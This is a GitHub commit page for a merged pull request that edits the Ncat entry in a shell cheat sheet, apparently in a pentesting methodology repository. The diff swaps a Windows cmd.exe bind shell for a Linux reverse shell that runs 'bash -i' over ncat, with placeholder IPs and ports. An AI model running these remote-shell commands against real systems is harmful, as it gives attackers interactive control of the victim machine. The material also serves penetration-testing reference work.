Skip to content

Commit

Permalink
Merge pull request #921 from fjh1997/master
Browse files Browse the repository at this point in the history
Correction: cmd.exe is part of Windows, not Linux.Use bash instead。
  • Loading branch information
carlospolop authored Aug 18, 2024
2 parents 3757701 + 74671b9 commit fb88a17
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions generic-methodologies-and-resources/shells/linux.md
Original file line number Diff line number Diff line change
Expand Up @@ -213,8 +213,8 @@ p.waitFor()
## Ncat

```bash
victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
attacker> ncat -v 10.0.0.22 4444 --ssl
victim> ncat <ip> <port,eg.443> --ssl -c "bash -i 2>&1"
attacker> ncat -l <port,eg.443> --ssl
```

## Golang
Expand Down

0 comments on commit fb88a17

Please sign in to comment.